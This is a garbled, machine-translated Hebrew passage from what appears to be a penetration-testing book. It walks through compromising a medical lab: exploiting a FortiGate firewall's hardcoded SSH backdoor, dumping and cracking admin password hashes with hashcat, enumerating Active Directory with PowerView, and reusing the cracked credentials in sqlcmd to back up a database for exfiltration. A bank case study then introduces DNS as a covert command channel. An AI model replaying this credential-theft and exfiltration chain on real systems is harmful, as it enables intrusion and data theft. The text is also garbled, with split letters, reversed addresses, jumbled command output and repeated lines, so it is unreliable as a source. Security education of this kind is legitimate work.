‫ע בודה מ ל בד שתיים וזה ני חו ש די טו ב שמדו בר ב שרת ‪-MS SQL,‬ו ‪ FTP‬בהתאמה‪.‬‬
‫ס ביר להני ח ש כ ל ת חנות הע בודה נגזרות מתמונת בנייה נפוצה לא חרונה‪.‬‬

‫לא ס ביר שנמצא שירותים שניתנים לניצו ל או ח ש בונות ח ל שים‪ .‬עם זאת‪ ,‬המ כונות ה ל לו‬
‫הן הי חידות ה כ לו לות ב‪AD. -‬המ ח ש בים הא חרים שי כו לים להיות ב טוו ח הזה הם לא‬
‫בג ל ל שהם לא מריצים את ‪ Windows‬ו ל כן לא בה כר חיהיו נתונים ל בי קורת ש ל הארגון‬
‫ב כ ל לותו‪ ,‬כמו גם לא ח ל ק ממדיניות הא ב ט חה הנא כפת ש לו‪ .‬סרי קת פינג מהירה מג לה‬
‫את הד ברים ה באים‪:‬‬
‫‪10.10.200.1‬‬
‫מאר ח א חד ב ל בד‪ .‬זה מא כז ב‪ ,‬מ כיוון ש כמע ט בוודאות זהיהיה הנת ב ע בור ר שת‬
‫המ שנה המ קומית‪.‬‬
‫הת קפה נגד מער כת מ שנית פגיעה‬

‫אנו מא שרים שזה המ קרה ע לידי חי בור א ליו באמצעות ‪SSH.‬הוא מציג את ה באנר ה בא‪:‬‬
‫‪ FortiGate OS‬גר סה ‪4.8‬‬
‫זה לא ר ק נת ב‪ ,‬זה חומת א ש‪ .‬לא ר ק זה‪ ,‬זו חומת א ש שנ ש ל חה מהיצרן עם סי סמה‬

‫מ קודדת‪ .‬אנ שים ח שודים ע שויים ל קרוא לזה "ד לת א חורית"‪ ,‬א ב ל היצרן התנער מזה‬
‫כ" בעיית ניהו ל מ כ שירים"‪.‬‬
‫כך או כך‪,‬י ש קוד ניצו ל צי בורי ל בעיה זמין מ כאן‪:‬‬

‫‪http://seclists.org/fulldisclosure/2016/Jan/26‬‬
‫אנו נ שתמ ש ב ס קריפ ט זה כדי ל ס כן את הנת ב‪ .‬לא חר שע שית זאת‪ ,‬תו כ ל לר שום את‬
‫מ שתמ שי המנה ל‪:‬‬
‫‪ #‬ק ב ל שם מנה ל מער כת‪:‬‬

‫שם מנה ל‪ :‬שם ‪RichardJones‬‬
‫‪DaveGammon:‬‬
‫ו להוריד את גי בו ב ה סי סמה ש להם א חד א חד‪:‬‬
‫‪#‬הצג מנה ל מער כת הגדרת סי סמה =‪AK1VW7boNstVjM36VO5a8tvBAgUJwLjryl1E+27F+lOBAE‬‬

‫‪ENC‬‬
‫‪FG100A #‬הצג מנה ל מער כת ‪ DaveGammon‬ק בע את ה סי סמה =‪QOeLCFK28‬‬

‫‪ENC AK1OtpiTYJpak5+mlrSoGbFUU60sYMLvCB7o/‬‬
‫‪FG100A #‬הצג מנה ל מער כת ‪RichardJones‬‬

‫הגדר סי סמה =‪ENC AK1P6IPcOA4ONEoOaNZ4xHNnonB0q16ZuAwrfzewhnY4CU‬‬
‫‪ Fortigate‬מא ח סנת את ה סי סמאות ש לה ‪ -Hash‬כ מ לו חים אך ל לא אי טרציה ש ל ‪SHA-1 .‬‬

‫במונ חים ש ל הדיו ט‪ ,‬זה אומר שאתהי כו ל לפצ ח אותם‪ .‬העת ק והד ב ק את התצורה למ ח ש ב‬
‫המ קומי ש לך וה שתמ ש בפצ ח ה סי סמאות ה חינמי ש ל ‪ HashCat‬כדי לפצ ח את הגי בו בים‬
‫מ כיוון שהוא תומך באופן ט בעי בפורמ ט זה‪:‬‬
‫‪ root@kali:/tmp# hashcat -a 0 -m 7000 med-fort usrshare/wordlists/rockyou.txt‬מאת ח ל‬

‫‪ hashcat v0.47‬לפי א טום עם ‪ 8‬חו טים וגוד ל מ ק טע ש ל ‪32MB...‬‬
‫גי בו ב נו סף מ קו בץ ‪ fortinet: 3 (3‬מ ל חים(‬
‫הערה‪ :‬ה ק ש אנ טר למ סך המצ ב‬
‫‪AK1P6IPcOA4ONEoOaNZ4xHNnonB0q16ZuAwrfzewhnY4CUA:SecurePass#1‬‬
‫‪AK1OtpiTYJpak5+mlrSoGbFUU60sYMLvCB7o/QOeLCFK28A:IloveJustinBeber‬‬
‫)‪Input.Mode: Dict (usrshare/wordlists/rockyou.txt‬‬

‫אינד ק ס…‪ )5/5 :..‬ק טע(‪)553080 ,‬מי לים(‪ )5720149 ,‬בתים(‬
‫התאו ש ש‪2/3 :.‬גי בו ב‪ 2/3 ,‬מ ל חים מהירות‪ /‬שנייה‪ 8.10 :‬מי ליון מי שורים‪ 8.10 ,‬מי ליון‬
‫מי לים הת קדמות‪553080/553080 (100.00%) :...‬‬
‫פוע ל‪ --:--:--:-- :...‬מ שוער‪--:--:--:-- :.‬‬
‫כאן אני מ שתמ ש בר שימת המי לים ‪rockyou.txt ,‬המ כי לה ‪ 14‬מי ליון מי לים‪.‬‬
‫הת קפת קריפ טה וה שוואה זו מ שווה כ ל מי לה בודדת ומ שווה אותה ;‪ -hash‬ל כא שרי ש לך‬
‫התאמה המי לה הזו היא ה סי סמה‪.‬‬
‫בה סת כ לות ע ל הפ ל ט‪ ,‬נמצאו שתי סי סמאות‪.‬‬
‫שימו ש חוזר באי שורים נגד מער כתיעד רא שונית‬

‫לא א כפת לי הר בה מ חומת הא ש עצמה‪ ,‬מ ל בד זה אניי כו ל להו סיף ער כת חו קים ש ל חומת א ש‬
‫המאפ שרת לך לג שת למע בדת המ ח קר הרפואי ו שאפ שר לה שתמ ש ב סי סמאות א לה במ קומות‬
‫א חרים‪ .‬מה שאני באמת רוצה לג שת א ליו הוא מ סד הנתונים ש ל ‪ MS SQL,‬ש כ כ ל הנראהיפע ל‬
‫ע ליציאת ברירת המ חד ל ש לו ‪1433.‬‬
‫אנ חנוי כו לים לה שתמ ש ב כ לי שורת הפ קודה ש ל ‪ Windows‬כדי ל בדו ק את האי שורים הגנו בים‬
‫ו לראות אם הם עו בדים ע ל שרת ‪SQL,‬א ב ל ת חי לה אתה רוצה ל בצע שאי לתה ‪ AD‬שו ב כדי‬
‫לג לות מהו שם המ שתמ ש ש ל הת חום ש ל דיי ב גמון‪ .‬ל שם כך‪ ,‬אפנה שו ב ל ק סם ש ל ‪PowerView:‬‬
‫‪ c:> powershell.exe -nop -exec‬עו קף >‪PS c:‬יי בוא‪-‬מודו ל ‪Get-NetUser -FullData | Out-File -.‬‬
‫>‪ \powerview.ps1 PS c:‬קידוד ‪ascii users.txt‬‬
‫לא חר חיפו ש בפ ל ט‪ ,‬אני מוצא את ה שורה שאנו מ חפ שים‪:‬‬

‫‪samaccountname: dgammon‬‬
‫נו‪ .‬כנראהי כו לתי לנ ח ש את זה‪ ,‬א ב ל ממ שי כים ה לאה‪ ,‬בואו נ בדו ק את האי שורים הא לה‪ .‬אם‬
‫הם עו בדים‪ ,‬זהיפר ט את מ סדי הנתונים הזמינים‪.‬‬
‫"‪-s medlab03-SQL -u coll-domain/dgammon -p ILoveJustinBieber -q "exec sp_databases‬‬
‫‪sqlcmd‬‬
‫להי ט ור שימת ‪DBs:‬‬
‫דגם מא ס טר ‪msdb perfuse-data tempdb‬‬
‫הר שימה מציגה אר בעה מ סדי נתונים ש ל ‪ MS SQL‬ו‪ db -‬מ שתמ ש א חד ב שם ‪perfuse-data.‬‬
‫זה נ שמע מ ב טי ח‪ .‬אז בואו גנו ב את זה‪ .‬הפ קודה ה באה תג בה את ה‪ db perfuse-data -‬לדי ס ק‪,‬‬
‫שם תו כ ל ל ח לץ אותו באמצעות ‪C2:‬‬
‫"'‪-p ILoveJustinBieber -Q "BACKUP DATABASE perfuse_db TO DISK='C:\perfuse_db.bak‬‬
‫‪sqlcmd -s medlab03-SQL -u coll-domain/dgammon‬‬
‫זה נגמר המ ש ח ק‪ .‬ר כ שתי את מ סד הנתונים ש ל היעד ש לנו‪ ,‬וזה די והותר כדי ל קרוא לזה‬
‫ניצ חון‪ .‬בתר חי ש ‪ APT‬בפוע ל‪ ,‬הייתי מ שתמ ש באי שורים הא לה כדי ל ק ב ל גי שה נו ספת לת חנות‬
‫הע בודה‪ ,‬גם לתו כנות ריגו ל הפרו סות‬
‫אי שורים כדי ל ק ב ל גי שה נו ספת לת חנות הע בודה‪ ,‬פר סו תו כנות ריגו ל כמו גם את‬
‫ה‪ 2C-‬ש לי‪ ,‬וגנ בו כ ל רעיון שה ח בר'ה הא לה הע לו‪.‬‬
‫סי כום‬
‫בפר ק זה‪ ,‬הצגתי ו ק טור חד ש ש ל הת קפה ‪-‬יי שומון ‪Java.‬הר ח בנו את ה‪ 2C-‬ש לנו‬
‫והעמדנו אותו במ ב חן‪ .‬ברגע שאתה נ כנ ס לר שת ש ליעד‪ ,‬ע קפת למע שה ‪90‬א חוז‬
‫מא ב ט חת הפעו לה‪ .‬במ קרה זה‪ ,‬היעד ה טמיע חומת א ש כדי ל ח סום את ר שת המ שנה‬
‫ש להם מ שאר הר שת‪ ,‬אך היא הייתה פגיעה והפ כה ב ק לות כדי לתת את המפת חות‬
‫לממ ל כה‪ .‬זה ראוי להדגי ש כי שימו ש חוזר באי שורים הוא הורג כא שר א חת מהמער כות‬
‫ה ל לו אינה מאו ב ט חת כמו ה שנייה‪.‬‬
‫מה שי ש לנו כאן הוא אמונה שמי שהו שרץ בדפדפן מאו ב ט ח ו לא מזי ק‪ -Java .‬שזה‬
‫"מא ב ט ח" ‪-‬אני כ ל הזמן שומע את זה א ב ל אני לא ב טו ח מה זה אומר‪ .‬אפ שר ליי שומון‬
‫‪ Java‬לפעו ל בדפדפן ש לך ואתה מריץ קוד הפע לה במ ח ש ב ש לך ב ב ט חה כאי לו הורדת‬
‫קו בץ ‪ .exe.‬חתימת קוד היא ח סרת מ שמעות במאה הע שרים וא חת ואין לה סתמך‬
‫ע ליה ל בי ט חון כאן או ב כ ל מ קום א חר‪.‬‬
‫למרות שפע ה כ לים המ סוג לים " לג לות ‪Command & Control",‬אתה צריך לה בין‬
‫שאתהי כו ל ב ק לות ל בצע הת קפות תוצרת בית‪ ,‬מותאמות אי שית למ שימה ספציפית‬
‫ש לא תזוהה‪.‬‬
‫הפר ק ה בא בו חן מער כות בנ קאיות מתפ שרות ו חי לוץ נתונים מת קדם‪.‬‬
‫‪1.‬המ שך ביי שום ה‪ 2C-‬והתנ סה בת כונות שנדונו‪.‬‬
‫‪ 2.‬ח קור אי לו ט כנו לוגיות א חרות פוע לות בה ק שר ש ל דף אינ טרנ ט ו כיצד ניתן‬
‫לה שתמ ש בהן באופן דומה כדי ל ק ב ל גי שה רא שונית לארגון‪.‬‬
‫‪3.‬נע שה שימו ש באימיי ל המוני בפר ק זה‪ ,‬א ב ל כמה מ סנני דואר ז ב ל היו עו שים זאת‬
‫ח סם אותו ‪ -‬למע שה‪ ,‬זו לעתים קרו בות ה בעיה הגדו לה ביותר בעת שימו ש בדוא" ל‬
‫בתור ו ק טור להת קפה‪ .‬באי לו ט כנו לוגיות א חרות ניתן לה שתמ ש כדי ל ספ ק את‬
‫כתו בת האתר ליעדים א לה בצורה מ ש כנעת?‬
‫פר ק ‪ 3‬שוד ש ל המאה הע שרים וא חת פר ק זה מ בו ס ס ע ל‬

‫הת ק שרותייעוץ ש ביצעתי לפני כמה שנים ע בור בנ ק בינ לאומי‬
‫גדו ל‪ .‬הם מעו לם לא ער כו סוג כזה ש ל מ ב חן ע ט לפני כן‪,‬‬
‫א ב ל ע שיתי הר בה בדי קות א חרות ע בורם בע בר אזי ש בנו‬
‫לד בר ע ל מה תהיה גי שה טו בה‪.‬‬
‫ל בנ קי ש כ סף‪ .‬זה סוג ש ל אמהות‪ .‬כ סף הוא לא ר ק הנ כ ס שי ש להגן ע ליו א לא המ שא ב‬
‫שמאפ שר את ההגנה הזו‪ .‬ה בנ קים נותנים עדיפות לא ב ט חה ב כ ל ש ל ב‪ ,‬באופן שארגונים‬
‫א חרים פ שו ט לאי כו לים‪ :‬כ ל שינוי בנייה ב כ ל ט כנו לוגיה‪ ,‬בין אם זו אפ לי קציה אינ טרנ טית‬
‫או מו ביי ל‪ ,‬נ בד ק הן כמ ב חן חדירה והן כ בדי קת קוד שורה א חר שורה‪ .‬כ ל ‪ IP‬ש ל כ ל‬
‫חי בור חיצוני נתון ל בדי קת חדירה פעם ב שנה‪.‬‬
‫מה ע שוי לע בוד?‬

‫לרו ב המ שתמ שים לא תהיה גי שה לאינ טרנ ט א ל שו ל חן הע בודה‪ ,‬וא לו ש כןימצאו את‬
‫זה מוג ב ל מאוד ‪ -‬מא קרו ‪ VBA‬ע שוי להי כנ ס לתי בת הדואר הנ כנ ס ש ל היעד‪ ,‬א ב ל‬
‫כנראהיי ח סם או שה קו בץ המצורףיימ ח ק ע ל פי מדיניות ל לא ק שר להי טים ש ל ‪AV.‬‬
‫יי שומון ‪ Java‬חתום ע שוי לרוץ בדפדפן ש ל היעד‪ ,‬אך ס ביריותר שהואיי ח ש ב‬
‫כ ט כנו לוגיה א סורה ויי ח סם בפרו ק סי האינ טרנ ט‪ .‬הגי שה הפיזית למת קנים מוג ב לת‬
‫מאוד‪ ,‬ו כ ל אדם שנ כנ ס אויוצאיזד ק ק לתג גי שה א ל ק טרוני‪ .‬ב קרת גי שה פיזית‬
‫מאפ שרת ר ק אדם א חד לע בור ב כ ל פעם עם חיי שני קר קע המ סוג לים ל ק בוע אם‬
‫יותר מאדם א חד מנ סה להי כנ ס ע ל תג בודד‪.‬‬
‫ס טייה הי ס טורית‬
‫בדי קת ה חדירה הרא שונה ש ביצעתי אי פעם הייתה אתר בנ קאי‪ .‬זה היה ‪20‬‬
‫באפרי ל‪1999. ,‬הייתי בן ‪23.‬אני זו כר הי ט ב את התאריך‪ ,‬לא בג ל ל שהמ ב חן היה‬
‫מעניין או מ למד במיו חד ‪-‬זה לא היה אף א חד מהם ‪-‬א לא בג ל ל שהיום ה סתיים‬
‫מע ט בצ ל האירועים בתי כון קו לומ ביין‪ ,‬א שר ) ב שעה הזמן( היה הירי ה ק ט לני ביותר‬
‫ב בית ה ספר בתו לדות ארה" ב‪ .‬ל כן שני האירועים תמיד היו ב לתי נפרדים במו חי‪.‬‬
‫שום ד בר לא ב טו ח‬
‫אז אין לנו מז ל‪ ,‬נ כון? זו כר שאמרתי ש שום ד בר לא ב טו ח? ו ב כן‪ ,‬זה ת קף גם ל בנ קים‪.‬‬
‫האנ שים ש כות בים קוד או מעצ בים אר כי ט ק טורת ר שתות ל בנ קים ניתנים ל טעויות כמו‬
‫כ ל א חד א חר‪ .‬לא כ ל בוד קי ה חדירה נוצרו שווים ו בי קורות קודי א ב ט חה אינן בדרך‬
‫כ ל ל א לא בז בוז זמןי קר כדי ל ספ ק את קצין הציות ומ בוצעות ע לידי אנ שים שאפי לו לא‬
‫י כו לים ל קודד ב שפה שהם אמורים ל ס קור‪ .‬אם אתה חו ש ב שאני צו ח ק‪ ,‬בפעם ה באה‬
‫שאתה מ ש לם ‪2,000‬דו לר ליום ע ל מי שהו שיי כנ ס וי בצע ס קירת קוד א ב ט חה‪ ,‬ב ק ש‬
‫ממנו ל כתו ב תו כנית פ שו טה ב שפה הר לוונ טית‪ .‬ת ק ב ל מ ב ט רי ק ו"ה ס בר" מדוע הם‬
‫מ שתמ שים ב כ לי "מיו חד"‪ .‬אז תגיד להם שהםי כו לים להא שים אותי שגרמתי להם‬
‫להיראות טיפ שים‪.‬‬
‫פו לי טי קה ארגונית‬
‫בעיה נו ספת היא שה בנ קים בדרך כ ל ל מפור קים למ חוזות ק טנים ‪-‬זה נ כון לג בי‬
‫ארגונים ר בים א ב ל נ כון במיו חד ב בנ קאות‪ .‬אין ר ק מ ח ל קת ‪IT‬א חת או צוות א חד ש ל‬
‫קודנים‪ .‬האנ שים ש כות בים את אפ לי קציית האייפון לצר כן כנראה אפי לו לא פג שו את‬
‫האנ שים ש כת בו את אפ לי קציית האתר ה קמעונאי הדומה‪.‬‬
‫ה סת כ ל ב שני ה כיוונים לפני חציית א‬

‫ר חו ב חד ס טרי‬
‫אנ שים לא בה כר ח מ בינים לגמרי את ה ס בי בות שהם מנה לים‪ .‬לדוגמה‪ ,‬ביצעתי‬
‫פעם בדי קת חדירה ש ל ר שת כ ספומ טים ש ל בנ ק וה ב חור שמנה ל את המע בדה‬
‫היה שם חמ ש שנים וה ב טי ח לי ש ס בי בת ה בדי קה נפרדת מר שת הייצור אז אני לא‬
‫צריך לדאוג להורדת מער כות חיות‪ .‬א לו שא לות ש למדתי ל שאו ל‪ .‬הדרך המהירה‬
‫ביותר לה ש לים את ה בדי קה הייתה להתפ שר ע ל פ ל טפורמת הניהו ל ש ל טי בו לי‬
‫שעד כנה אפ לי קציות ב כ ספומ טים‪ .‬לא חר מ כן ש ל חתי פ קודה ל כ ל נ קודות ה קצה‬
‫להפעי ל את מ ש ח ק ה סו לי טייר‪ ,‬שהופיע בצייתנות ע ל כ ספומ ט המע בדה ש לפני‪.‬‬
‫מרוצה‪ ,‬ה ח ל טתי שזו נ קודה טו בה ל ל כת במע לה ה כ בי ש ו ל ח טוף בי ס‪ .‬ליד ה טיי ק‬
‫אווי ה סורינאמי בו התנ שאתי לעתים קרו בות היה כ ספומ ט ש ל ה בנ ק שע בדתי בו‪.‬‬
‫זוג ל קו חות מ בו ל ב ל בהה במ ש ח ק ה סו לי טייר שרץ ע ל המ סך‪ .‬הד בר הרא שון‬
‫ש ח ש בתי היה "זה צירוף מ קרים" עד שה ח ל ק ה ח שי בתי בפוע ל במו ח ש לי נ כנ ס‬
‫ורצתי ב חזרה למע בדה‪,‬‬
‫עד שה ח ל ק ה ח שי בתי בפוע ל במו ח ש לי נ כנ ס ורצתי ב חזרה למע בדה‪ ,‬מ חייג תוך‬
‫כדי‪ .‬הנ קודה ש לי היא שגם אם מי שהו אומר לך שזה ר חו ב חד ס טרי ‪-‬ת סת כ ל‬
‫ל שני ה כיוונים לפני שאתה חוצה אותו‪.‬‬
‫מוד ל ‪ APT‬לעומת חדירה מ סורתית‬

‫בדי קה‬
‫דוגמנות ‪ APT,‬לעומת זאת‪ ,‬היא לא מ שהו שמת בצע לעתים קרו בות ו כ שזה נע שה‪ ,‬זה‬
‫בדרך כ ל ל לא נע שה כמו שצריך‪ .‬ה בעיה )ההו ל כת וגו ברת( עם בדי קות חדירה באופן‬
‫כ ל לי היא שהיא מ לאה ב שר ל טנים‪ .‬זה ת חום מיו חד בתוך ת חום מתמ חה והתו בנה ה כי‬
‫גדו לה ש ל קו חי ק ב ל לג בי כ שירות היועץ תהיה עד כמה הדו ח ה סופי מ ברי ק‪.‬‬
‫לעו לם א ל ת סמוך ע ל אי שורי בדי קת ע טים כהו כ חה לי כו לת בעת ש כירתיועצים ‪ -‬כו לם‪,‬‬
‫ל לאיוצא מן ה כ ל ל‪ ,‬ז ב ל‪ .‬ה" כי שורים" ה ל לו מונפ קים ע לידי טפי לי אופור טוני ס טים‬
‫ציניים שה שתמ שו ‪ -FUD‬ב כדי ל ב ס ס את עצמם כ ס טנדר ט‪ .‬הם טוענים שהם מ שפרים‬
‫את מערך ה כי שורים ה ב סי סי תוך ה ק טנתו לנ קודה הנמו כה ביותר שהייתה אי פעם‪.‬‬
‫אני לאי כו ל לנ קו ב ב שמות א ב ל ה סי בה שהאי שורים הא לה מצ לי חים כ ל כך היא בעצם‬

‫זו‪ :‬שתי ח ברות מת חרות ע ל הת ק שרותייעוץ‪ .‬לאדם שצריך ל ב חור ספ ק אין ני סיון‬
‫ב שיתוף אנ שים כא לה והה בד ל ה בו ל ט הי חיד שהואי כו ל לראות הוא ש לא חדי ש ה סמ כה‬
‫ו לא חד אין‪ .‬הוא בו חר את ה ח ברה הרא שונה ומ ס ביר לא חרון כיצד הת ק ב לה הה ח ל טה‪.‬‬
‫אתהי כו ל להמר שאי ש מ כירות חוזר למ שרד וצור ח ע ל ע בודה שא בדה ויועצים " לא‬
‫מו כ שרים"‪ .‬זו בעיה מ סוימת ב ברי טניה מ סי בה כ ל שהי‪ .‬לגרום להם להו כי ח את הידע‬
‫ש להם‪ .‬עדיף ‪ -‬להת ק שרויות ארו כות טוו ח במ סגרת ‪-‬ה ביאו שתיים או ש לו ש ח ברות‬
‫ליום ותגרמו להן להת חרות זו בזו ע ל אותה ס בי בה‪ .‬לגרום להם להזיע‪ .‬ב קרו ב תפריד‬
‫את הג ברים מה בנים )או ה בנות‪ ,‬כפי שי ש לנו ע כ שיו בוד קי ע טים(‪ .‬אה‪ ,‬ו שא ל אם א חד‬
‫מהאנ שים ה ט כניים ש לךי כו ל להיות מעור ב כדי לראות ע ל מה אתה מ ש לם‪ .‬ח ל קם‬
‫יהפ כו לירו קים וירוצו א ל הד לת; א חריםי למ לו ע לידע " קנייני" או " סודי"‪ .‬סיים מיד את‬
‫ה שי חה עם כ ל מי ש לא מו כן לע בוד ב ש קיפות‪.‬‬
‫ה בנ ק מינה זה עתה קצין א ב ט חת מידע רא שי חד ש )‪ (CISO‬שהיה להו ט מאוד‬
‫להעמיד את א ב ט חת הע ס ק במ ב חן באופן מציאותי‪ .‬זה היה מ ש ח ק ח כם מצידו‪,‬‬
‫מ כיוון שי כו לנו ל בדו ק הר בה מע בר ל‬
‫ֶד ֶרך‪ .‬זה היה מ ש ח ק ח כם מצידו‪ ,‬ש כןי כו לנו ל בדו ק הר בה מע בר לג בו לות ש ל תרגי ל‬
‫ציות‪ ,‬ו כ ל פגיעות שהתג לתהי כו לה להיות מיו ח סת ל קודמו‪ .‬התדריך היה בערך כך‪:‬‬
‫"פרוץ לנו‪ .‬כ שיהיה לך‪ ,‬הי כנ ס ותן מצגת לדיר ק טוריון שתפ חיד אותם לעזאז ל ות שיג לי‬
‫ת קצי ב גדו ליותר‪ .‬פ שו ט א ל תע שה שום ד בר לא חו קי"‪ .‬כאי לו הייתי רוצה‪.‬‬
‫זה הו לך להיות מ ב חן מאתגר במיו חד‪ ,‬ו כתוצאה מ כך נצ טרך לפתור כמה בעיות‬
‫מ סו ב כות‪:‬‬
‫איך היינו מת כוונים להע ביר את המ טען ש לנו ב ס בי בה ספר טנית‪ ,‬מודעת א ב ט חה?‬
‫כיצד נו כ ל לה קים ו לנה ל פי קוד ו ב קרה ב ס בי בה ש בה למע ט מאוד מ שתמ שים הייתה‬
‫גי שהי שירה לאינ טרנ ט וא לו ש כן נא לצו ל ס בו ל פרו ק סי מג בי ל ביותר?‬
‫מ ב חני ‪ APT‬כו ל לים‪ ,‬בין אם באופןי שיר או ע קיף‪ ,‬מניפו לציה אנו שית‪ .‬בני אדם הם לא‬
‫מ ח ש בים‪ .‬הםי ח שדו ו לא תו כ ל להמ שיך לה כות אותם עם הת קפה א חרי הת קפה כו ש לת‬
‫‪-‬היעד ש לךי בין במהרה שהם ממו קדים‪.‬‬
‫זוהי גם ס בי בה ש בה מדיניות הא ב ט חה מ חיי בת ש שומרי מ סך נו שאים אזהרות מודעת‬
‫א ב ט חה‪ :‬ד ברים מ סוג "א ל תי ק ח ממת קים מזרים"‪ .‬בעיה א חת ב כ ל פעם‪ .‬בואו נע שה‬
‫ד ברים הפוך ונד בר קודם ע ל ה‪ 2C-‬ש לנו‪.‬‬
‫פי קוד ו ב קרה ח ל ק ש לי שי‪ :‬מת קדם‬

‫ערוצים ו חי לוץ נתונים‬
‫נ כון שאין חי בורי שיר ל קר קע ש ל המ שתמ ש לאינ טרנ ט א ב ל זו כרים קודם כ שאמרתי‬
‫שאנ שים לרו ב לא מ בינים עד ה סוף את ה ס בי בות שהם מנה לים? זה נ כון כאן לא פ חות‬
‫מא שר ברו ב המ קומות‪ .‬אתה לא צריך חי בור "י שיר" לאינ טרנ ט‪ ,‬אתה ר ק צריך להיות‬
‫מ סוג ל להוציא נתונים ל‪ 2C-‬ש לנו וזה ב שום אופן לא אותו ד בר‪ .‬אתהי כו ל ל קוות שנ שיג‬
‫מ שתמ ש עם גי שת פרו ק סי וניר ש את ההר שאות הא לה לד בר עם האינ טרנ ט‪ ,‬א ב ל זה‬
‫י שאיר אותך עם חי בור מוג ב ל מאוד שנו שאיותר מדי אי ודאות‪ .‬אתהי כו ל לע שותיותר‬
‫טו ב‪ .‬ש קו ל את הדוגמה ה באה‪.‬‬
‫אנייו ש ב ע ל ‪-LAN‬הה בנ קאי ואני מ ק ליד את הפ קודה ה באה ומ ק ב ל את הפ ל ט ה בא‪:‬‬
‫> פינג ‪www.google.com‬‬
‫פינג ]‪ -www.google.com [74.125.136.147‬ל עם ‪ 32‬בתים ש ל נתונים‪ :‬תם הזמן ה קצו ב‬

‫ל ב ק שה‪.‬‬
‫תם זמן ה ב ק שה‪.‬‬
‫תם זמן ה ב ק שה‪.‬‬
‫ס ט טי ס טי קות פינג ע בור ‪ 74.125.136.147:‬מנות‪ :‬נ ש ל חו ‪= 3,‬הת ק ב לו ‪= 0,‬א בדו ‪= 3‬‬

‫)הפ סד ש ל )‪100%‬‬
‫מה בדיו ק קורה כאן? "אה‪ ",‬אתה עונה‪" ,‬אתה אידיו ט‪ .‬אין לך גי שה לאינ טרנ ט )או‬
‫לפ חות מנות ‪ ICMP‬מוג ב לות(‪ ,‬אז אתה מ ק ב ל פ ס ק זמן‪ .‬מה ח ש בת שי קרה?"‬
‫זה לא כ ל מה ש קורה‪.‬‬
‫ש ל חתי פינג ש ל שם דומיין מ לא וה ח בי לות נ שמ טו א ב ל קודם זה נפתר ל כתו בת ‪IP.‬‬
‫כתו בת ‪IP‬צי בורית באינ טרנ ט‪ .‬שרת ‪-DNS‬ההמ קומיי כו ל לפתור כתו בות ‪ IP,‬מה שאומר‬
‫ש ב ש ל ב מ סוים ב שר שרת ‪-DNS‬ה מאר ח מד בר עם גוג ל‪ .‬כנראה שגם ל שרת ‪-DNS‬ה‬
‫המ קומי הזה אין גי שהי שירה לאינ טרנ ט‪ ,‬א ב ל הוא בה ח ל טי כו ל לד בר עם ‪-DNS‬ההפונה‬
‫לאינ טרנ ט ש ל ה בנ ק כדי לפתור שאי לתות‪ .‬העו בדה שמנות ה‪ PMCI-‬הו שמ טו אינה‬
‫ר לוונ טית‪ :‬אניי כו ל לה שתמ ש ברזו לוציית ‪ DNS‬עצמה כאמצעי פי קוד ו ב קרה‪ .‬אם אתה‬
‫מ סת כ ל ע ל שאי לתת חפירה ‪ ,‬הד ברים ע שויים להיות הגיונייםיותר‪:‬‬
‫ל חפור ‪+‬ע קו ב א חר ‪www.google.co.uk‬‬

‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS b.root-servers.net.‬‬

‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS f.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS h.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS m.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS j.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS d.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS g.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS k.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS i.root-servers.net.‬‬
‫‪.‬‬ ‫‪8238‬‬ ‫‪IN NS a.root-servers.net.‬‬
‫‪.‬‬ ‫‪ 228‬בתים‬
‫‪NS‬ל ‪IN‬‬
‫‪ c.root-‬קי ב‬
‫‪8238 8238‬‬
‫‪servers.net.‬‬
‫;; ‪8238‬‬
‫‪.‬‬ ‫‪15 IN‬א לפיות ה שנייה‬
‫‪NS‬תוך‬
‫מ‪(4.4.8.8)35#4.4.8.8-‬‬
‫‪e.root-servers.net.‬‬
‫‪.‬‬ ‫‪IN NS l.root-servers.net.‬‬
‫נ‪ .‬ס‬ ‫‪nsa.nic.uk.‬‬

‫‪172800 IN‬‬
‫ְ ּב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪ּ ְ .‬ב רִי טַנִיָה‪.‬‬
‫נ‪ .‬ס‬ ‫‪nsb.nic.uk.‬‬

‫‪172800 IN‬‬
‫נ‪ .‬ס‬ ‫‪nsc.nic.uk.‬‬
‫‪172800 IN‬‬
‫נ‪ .‬ס‬ ‫‪172800 IN‬‬
‫‪nsd.nic.uk.‬‬
‫נ‪ .‬ס‬ ‫‪172800 IN‬‬
‫‪dns1.nic.uk.‬‬
‫נ‪ .‬ס‬ ‫‪172800 IN‬‬
‫נ‪ .‬ס‬ ‫‪172800 IN‬‬
‫נ‪ .‬ס‬ ‫‪172800 IN‬‬
‫;; קי ב ל ‪ 454‬בתים מ‪ (921.41.0.391)35#921.41.0.391-‬ב‪ 82-‬א לפיות ה שנייה‬
‫נ‪ .‬ס‬ ‫‪172800 IN ns3.google.com.‬‬

‫‪google.co.uk.‬‬
‫נ‪ .‬ס‪172800‬‬
‫‪ -google.co.uk.‬ב‬
‫‪google.co.uk. ns1.google.com.‬‬
‫‪ns4.google.com.‬‬
‫נ‪ .‬ס‬ ‫‪ -google.co.uk.‬ב ‪172800‬‬
‫נ‪ .‬ס‬ ‫‪172800 IN ns2.google.com.‬‬
‫‪300‬‬ ‫‪IN‬‬ ‫א‬ ‫‪74.125.21.94‬‬

‫‪www.google.co.uk.‬‬
‫‪ dig +trace‬עו בד ע לידי העמדת פנים שזהו שרת שמות באמצעות שאי לתות אי טר טי ביות ו‬
‫עו ק ב א חר הפניות לאורך כ ל הדרך‪ .‬כאן אתה רואה את שמות ה סמ כותיים‬
‫שרתי שמות ע בור ‪ google.co.uk‬ו כן רזו לוציית ה‪ PI-‬ה סופית‪.‬‬
